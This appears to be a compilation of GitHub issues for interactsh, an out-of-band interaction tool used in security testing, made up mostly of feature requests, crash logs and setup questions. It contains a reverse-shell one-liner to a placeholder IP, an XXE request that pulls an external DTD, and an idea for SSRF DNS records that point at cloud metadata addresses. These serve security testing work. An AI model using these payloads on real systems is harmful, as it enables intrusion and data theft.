How about DHCP? For example, with CVE-2019-13263, you could encode data to be sent cross-router into the 32-bit Transaction ID field. More research is needed, but obscure DHCP bugs would be cool to find. (;

Originally posted by @geeknik in #7 (comment)

• Added secret-key requirement upon deregister request.
• Added correlation-id validation check upon new registration.

@Mzack9999 we may also filter regular output with this feature.

For example with interactsh-client -http-only or -dns-only

Current behavior:-

[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 103.195.200.42 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 172.253.226.98 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 103.195.200.42 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 172.217.34.131 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:24

After support:-

[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:24

Originally posted by @ehsandeep in #40 (comment)

Hello and thank you for this awesome tool, it will surely come in handy during our testing.

The current behavior of interactsh is to create a randomized subdomain like c282n3l3djgbti5v595gcnenzdoyyyyyn.domain.tld, which is fine and all, however, we have a pretty nice 4 x 2 domain and we feel that smaller payloads are the best, so could you allow the use of the base domain and/or customized sub-domains for self-hosted servers in addition to the randomized subdomains?

Edited to ask for customized sub-domains option as well. 👍🏻

Block bots, if we use notify and bots crawl it, it will be noisy notifs.

TODO:

• load testing & profiling
• come up with a scaling solution

Reference: #107

https://xsshunter.com/features

Using HTML5 canvas API for self hosted instances.
If possible, for shared public instance.

I see that you have implemented the burp collaborator feature of wildcard mapping to the source collaborator address.

Example : ..interact.sh -> .interact.sh

That's great feature . But it would be great if you print this whole ..interact.sh on the terminal whenever a query triggered without verbose flag. Because verbose flag print many unwanted information (in case of DNS queries).

Example:

if we ping anything.<UNIQUE-ID>.interact.sh
And the interactsh client shows ( without verbose flag)
[<UNIQUE-ID>] Recieved DNS interaction (A) from <ORIGIN-IP> at <TIMESTAMP>

So the anything is omitted , which is sometimes important during Bug Bounties.

An FTP listener would be interesting to include in Interactsh.

It would be valuable to log the authentication that an FTP client uses along with the commands they ran. It would be helpful to see the files the external client attempted to read or upload.

FTP is supported by default in Java applications where an attacker has control over a URL object. It comes up in XXE OOB testing as well.

Maybe it is not very necessary, but if it would be something interesting, a client for burpsuite (community), it is necessary to take into account that it would be an extra maintenance, no wonder they reject the idea. but still I comment

custom url for somthing content. like:

request url: http://interactsh.sh/bash get response : sh -i >& /dev/tcp/10.10.10.10/9001 0>&1

This is not completed but limited available logs.

net/http.(*conn).readRequest(0xc03c1d72c0, 0x921bf8, 0xc03c80ad80, 0x0, 0x0, 0x0)
        /snap/go/7954/src/net/http/server.go:966 +0x19d
net/http.(*conn).serve(0xc03c1d72c0, 0x921ca0, 0xc03c80ad80)
        /snap/go/7954/src/net/http/server.go:1858 +0x705
created by net/http.(*Server).Serve
        /snap/go/7954/src/net/http/server.go:2993 +0x39b

goroutine 197138914 [IO wait, 2 minutes]:
internal/poll.runtime_pollWait(0x7f922ad4b4f0, 0x72, 0xffffffffffffffff)
        /snap/go/7954/src/runtime/netpoll.go:222 +0x55
internal/poll.(*pollDesc).wait(0xc09119b318, 0x72, 0x1000, 0x1000, 0xffffffffffffffff)
        /snap/go/7954/src/internal/poll/fd_poll_runtime.go:87 +0x45
internal/poll.(*pollDesc).waitRead(...)
        /snap/go/7954/src/internal/poll/fd_poll_runtime.go:92
internal/poll.(*FD).Read(0xc09119b300, 0xc08affa000, 0x1000, 0x1000, 0x0, 0x0, 0x0)
        /snap/go/7954/src/internal/poll/fd_unix.go:166 +0x1d5
net.(*netFD).Read(0xc09119b300, 0xc08affa000, 0x1000, 0x1000, 0xc0083f8400, 0xc05a07d668, 0x89adb9)
        /snap/go/7954/src/net/fd_posix.go:55 +0x4f
net.(*conn).Read(0xc0bff81610, 0xc08affa000, 0x1000, 0x1000, 0x0, 0x0, 0x0)
        /snap/go/7954/src/net/net.go:183 +0x91
net/http.(*connReader).Read(0xc09170f470, 0xc08affa000, 0x1000, 0x1000, 0x4b6956, 0xc09215d08b, 0xb)
        /snap/go/7954/src/net/http/server.go:780 +0x1b9
bufio.(*Reader).fill(0xc08afe7aa0)
        /snap/go/7954/src/bufio/bufio.go:101 +0x108
bufio.(*Reader).ReadSlice(0xc08afe7aa0, 0xc03828f80a, 0x764367, 0xc08ac8f080, 0xb1e2ae, 0x2, 0x2)
        /snap/go/7954/src/bufio/bufio.go:360 +0x3d
bufio.(*Reader).ReadLine(0xc08afe7aa0, 0x203024, 0x203024, 0x0, 0x0, 0xc03828fa78, 0x764dc5)
        /snap/go/7954/src/bufio/bufio.go:389 +0x34
net/textproto.(*Reader).readLineSlice(0xc0923b0870, 0xc0922c9200, 0xc03828f9e8, 0x4dc773, 0xc09119b300, 0x43a77c)
        /snap/go/7954/src/net/textproto/reader.go:57 +0xd6
net/textproto.(*Reader).ReadLine(...)
        /snap/go/7954/src/net/textproto/reader.go:38
net/http.readRequest(0xc08afe7aa0, 0x0, 0xc0922c9200, 0x0, 0x0)
        /snap/go/7954/src/net/http/request.go:1027 +0xaa
net/http.(*conn).readRequest(0xc0917ac140, 0x921bf8, 0xc0910ff980, 0x0, 0x0, 0x0)
        /snap/go/7954/src/net/http/server.go:966 +0x19d
net/http.(*conn).serve(0xc0917ac140, 0x921ca0, 0xc0910ff980)
        /snap/go/7954/src/net/http/server.go:1858 +0x705
created by net/http.(*Server).Serve
        /snap/go/7954/src/net/http/server.go:2993 +0x39b

Hey all,

I may be simply looking in the wrong place but there seems to be little guidance on what needs to be in place for the interactsh-server to succeed

for example:
./interactsh-server -domain yoink.domain -hostmaster jc@doain -ip 44.44.44.4xx -debug

following the guide will tell me '[ERR] Could not serve dns on port 53: listen udp 0.0.0.0:53: bind: address already in use'
and 021/07/16 10:40:30 Creating new order for domains: [*.yoink.domain yoink.domain]
2021/07/16 10:40:30 Order created: https://acme-v02.api.letsencrypt.org/acme/order/000000/00000000
2021/07/16 10:40:30 Fetching authorization: https://acme-v02.api.letsencrypt.org/acme/authz-v3/000000000
2021/07/16 10:40:30 Fetched authorization: yoink.domain
2021/07/16 10:40:40 Updating challenge for authorization yoink.domain: https://acme-v02.api.letsencrypt.org/acme/chall-v3/0000000000/8z7VSF
[FTL] Could not generate certs for auto TLS

but disabling systemd-resolved only tells me only 'Could not generate certs for auto TLS' assuming i cant resolve it anymore :)

so, any pointers to what i'm not getting in regards to why this is failing ? and to the title, might that be a good common document for all ?

Thanks!

Linux yoinker 5.4.0-73-generic projectdiscovery/nuclei#82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

• Generating new intractable payload

  • Default to generate 1 link
  • User can request many as per need.

• User controlled poll time settings.

  • We can define default poll time.

• Multi tab support to manage / track / view multiple payloads at same time.

• Filters for displaying DNS / HTTP / SMTP Interaction in default view.

• Fields (same as burp only for inspiration)

  • Time (Interaction time)
  • Type (Interaction type)
  • Payload (Interact Payload)
  • Comment

• Fields per interaction type

  • DNS

    • Interaction Information / description
    • RAW DNS query

  • HTTP

    • Interaction Information / description
    • Request dump
    • Response dump

  • SMTP

    • Interaction Information / description
    • SMTP Interaction dump

  • Misc Features

    • Search (Search between all interactions)
    • Copy (Request/Response)
    • Download (Request/Response)
    • Decode (HTML/URL)

Hello I am trying to use interactsh and I need the server to listen on ports other than the default 53, 443, etc due to a reverse proxy in front of the server. I looked at the source code and see there's a string concat with :53 for dns, so it appears it's not possible to make this part dynamic. Could you please add the ability to listen on different ports other than the default? Thanks.

running interactsh-client without any options is triggering the below error.
Version : 0.0.2
OS: OSX

$interactsh-client

    _       __                       __       __
   (_)___  / /____  _________ ______/ /______/ /_
  / / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
 / / / / / /_/  __/ /  / /_/ / /__/ /_(__  ) / / /
/_/_/ /_/\__/\___/_/   \__,_/\___/\__/____/_/ /_/ v0.0.2

		projectdiscovery.io

[FTL] Could not create client: could not make register request: POST https://interact.sh/register giving up after 6 attempts: Post "https://interact.sh/register": dial tcp: lookup interact.sh: no such host

I hosted your interactsh-server on a a droplet. Everything is working like a charm. But I have a question:
Can I use an old generated payload link ? access its http/dns/smtp requests within the server using the client side (interactsh-client ? please ?

• TCP
• UDP

Possible implementation: libpcap/xdp?

Hello and thank you for this awesome tool, it will surely come in handy during our testing.

Could you make the default text more easily customizable and persistent between updates for those of using self-hosted servers? Currently it includes a line that says If you find communications or exchanges with the Interact.sh server in your logs, it is possible that someone has been testing your applications using our hosted service, app.interact.sh.

Maybe it should detect the base domain being used by the server and display that instead?

Interactsh server version:- 0.0.6

2021/10/09 22:47:15 TLS certificates are not expiring, continue!
2021/10/09 22:47:15 Listening on DNS, SMTP and HTTP ports
fatal error: runtime: out of memory

runtime stack:
runtime.throw(0xf6974e, 0x16)
	/snap/go/8408/src/runtime/panic.go:1117 +0x72
runtime.sysMap(0xc0d0000000, 0x4000000, 0x161bdb0)
	/snap/go/8408/src/runtime/mem_linux.go:169 +0xc6
runtime.(*mheap).sysAlloc(0x16029a0, 0x400000, 0x7fffffffffff, 0x7ff7077fdd98)
	/snap/go/8408/src/runtime/malloc.go:729 +0x1e5
runtime.(*mheap).grow(0x16029a0, 0x1, 0x0)
	/snap/go/8408/src/runtime/mheap.go:1346 +0x85
runtime.(*mheap).allocSpan(0x16029a0, 0x1, 0x1100, 0x1ff)
	/snap/go/8408/src/runtime/mheap.go:1173 +0x609
runtime.(*mheap).alloc.func1()
	/snap/go/8408/src/runtime/mheap.go:910 +0x59
runtime.systemstack(0xc000314900)
	/snap/go/8408/src/runtime/asm_amd64.s:379 +0x66
runtime.mstart()
	/snap/go/8408/src/runtime/proc.go:1246

Complete crash trace - interact-crash.txt

Hello team,
Just a suggestion , if you can make the collab url as wildcard (i.e. *..interact.sh resolve to .interact.sh), just same as the burp collaborator do.

If that can be done , that would be greatful.

And thanks for your awesome Tools.

I Am Using Interactsh Client To Test XXE

POST / HTTP/1.1
Host: company.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root SYSTEM "http://ID.interact.sh/file.dtd">
<root>
      <email>&pwnfromME;</email>
      <password>*********</password>
</root>

So How Can Configure Interactsh Client To Read file.dtd

Hello, currently there is no protection against allowing anyone to connect to a self-hosted hosted if they know the URL. Please add some sort of authentication mechanism so that servers aren't abused. Maybe something like this?

$ interactsh-server -auth "$(uuid-gen)"
$ interactsh-client -auth "generated-uuid" -url https://domain.tld

Thank you.

As Interactsh is about OOB interaction supporting DNS it would be nice to have a DNS rebinding by the same occasion.

This mean having a way to get resolvable resource records with any given contents for assisting in detection and exploitation of SSRF-related vulnerabilities.

I have fetched a list of DNS rebinding tools but most are hard to setup, featureless and unmaintained. The most interesting project to understand all major features is 1u.ms (source), their website describe well all possibilities.

Right now Interactsh is similar to most HTTP request collector and inspector tools but lacks of DNS rebinding.

What I said for DNS could also be meaningful for HTTP, being able choose the body or headers served by the server.

Probably already covered by #10

Please describe your feature request:

Adding goflags support into interactsh-client and interactsh-server

Describe the use case of this feature:

• default flag config file
• flags grouping
• long/short flag support

Previously:

defaultCacheMaxSize = 5000

Now:

defaultCacheMaxSize = 1000000

Sometimes I use Responder just to collect incoming hashes from AD/Windows integrated apps
it's not a big inconvenience for me to just configure it to listen from my private hosted interactsh-server, but it would be a nice to have a built in listener to register/capture/note those events dont you think ?

More protocols :D

Describe the bug
Project depends on github.com/prologic/smtpd, but https://github.com/prologic/smtpd results in a 404, repo seems gone.
Error occurred when trying to open the Nuclei source in GoLand on a pristine machine.

Version
Nuclei: Trunk of master (currently at 84244b5)
Interactsh: Seems to be present in trunk, too

Screenshot of the error or bug

go list -modfile=nuclei/v2/go.mod -m -json -mod=mod all #gosetup
go: github.com/projectdiscovery/[email protected] requires
	github.com/prologic/[email protected]: invalid version: git fetch -f origin refs/heads/*:refs/heads/* refs/tags/*:refs/tags/* in ~/go/pkg/mod/cache/vcs/65b3100cfa8e2061b6047e41aaceb4a1e850f70977a718cfde5bd0e009bb0722: exit status 128

➜ interactsh-client git:(main) ✗ ./interactsh-client -url https://10.10.123.237

_       __                       __       __

()__ / /____ _________ / // /_
/ / __ / / _ / / __ '/ / _/ / __
/ / / / / // __/ / / // / // /( ) / / /
/// //__/_// _,/___/_/__// // v0.0.3

	projectdiscovery.io

[INF] Listing 1 URL for OOB Testing
[INF] c43v1fecie6h4kfllrvgcrd9bxeyyyyyn.10.10.123.237

How to use httplog ？

http://10.10.123.237/c43v1fecie6h4kfllrvgcrd9bxeyyyyyn

Is this supported ？

``Hello team , thanks for all the great things you do . I do have an issue with the interact client where dns request are not logged . http works fine but when ever the request is a dns request only, nothing works
nslookup blahblahblah.c4l7u968kh02ipm31b50jntiyyozltipn.interact.sh does not work at all .

Sometimes I receive too many DNS requests from targets. I will like to be able to only retrieve HTTP requests in verbose output.

#output all requests/responses
interactsh-client -v
#output only http requests/responses
interactsh-client -v -http-only
#output only dns requests/responses
interactsh-client -v -dns-only

Hi team,

I have created a DO Debain Droplet and installed a Floating IP added the configuration as said under the self hosted instance guide. Can anyone please help?

Hi, I'm using Nuclei, interact and notify to spot OOB requests, however the webhook is spamming me with this

Could a IP filter argument be added so they're not passed through into STDOUT?

It has been reported several times that the current domain is used by interactsh server - interact.sh - is not resolved by a few VPS providers, preventing such systems from using interactsh client and Nuclei integration.

The default interactsh server will now be located at https://interactsh.com The old server (interact.sh) will remain available.

Hi,

It seems like DO droplets are blocked or something. Check out the image. the same issue when I tried a different droplet (different IP).

Also, thank you all for the AMAZING tools you make! <3

┌──(root💀milani)-[~]
└─# go get -v github.com/projectdiscovery/interactsh/cmd/interactsh-client                                   127 ⨯

github.com/pierrec/lz4 (download)
cannot find package "github.com/pierrec/lz4/v4" in any of:
        /usr/lib/go-1.15/src/github.com/pierrec/lz4/v4 (from $GOROOT)
        /root/go/src/github.com/pierrec/lz4/v4 (from $GOPATH)

https://github.com/pierrec/lz4/v4

When I run the command interactsh-server -domain mydomain.com -hostmaster [email protected] -ip [VPS IP]. The following output is given without any errors:

2021/05/01 08:45:17 Creating new order for domains: [*.mydomain.com mydomain.com]
2021/05/01 08:45:17 Order created: https://acme-v02.api.letsencrypt.org/acme/order/121967319/9409571122
2021/05/01 08:45:17 Fetching authorization: https://acme-v02.api.letsencrypt.org/acme/authz-v3/12762297545
2021/05/01 08:45:17 Fetched authorization: mydomain.com
2021/05/01 08:45:27 Updating challenge for authorization mydomain.com: https://acme-v02.api.letsencrypt.org/acme/chall-v3/12762297545/FkqiUg

But the server is not giving A records when queried. I already had a letsencrypt cert but even after I deleted the cert nothing changed the same output is given

Ref for implementation: https://github.com/SecureAuthCorp/impacket

• Hardcoded DNS entry for specific(app) subdomain.
• This is intended to used by interactsh hosted server only.
• This allows to host Web Client under same domain
  • https://interact.sh - Interactsh Server
  • https://app.interact.sh - Interachsh Web Client

• Added default value for hostmaster flag as admin@domain
• Added verbose error upon failures
• Added origin-url flag for dynamic ACAO used for web interactsh client

Add 2 subdomains which resolve to various cloud provider metadata IPs.

For general cloud services, one should resolve to: 169.254.169.254
For Alibaba, one should resolve to: 100.100.100.200

Once created, the metadata-*yaml templates can be updated to use them.

custom the length of the subdomain payload, for length-limited input scenarios.

The server adds an allowable length range parameter, example: -payload-length 1-16
The client specifies the length of the generated payload, example: -payload-length 4

• Using application/json instead of text/plain on successful response.
• Adding response msg upon successful registration at /register endpoint

HTTP/2 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Origin: *
Content-Length: 0
Date: Sat, 11 Sep 2021 09:50:37 GMT

{"message":"registration successful"}

Right now on sending an http request to the interact.sh url we simply get the following response:

Recieved HTTP interactionfrom <ip> at <time>

it would be helpful if we could see the contents of the get/post content of the http request like in https://webhook.site/

Ex:
Request at target
GET customSubdomain.<interactshsubdomin>.interact.sh/someData

or

POST customSubdomain.<interactshsubdomin>.interact.sh
{
value: SomeData
}

interactsh-client logs display SomeData or the whole json file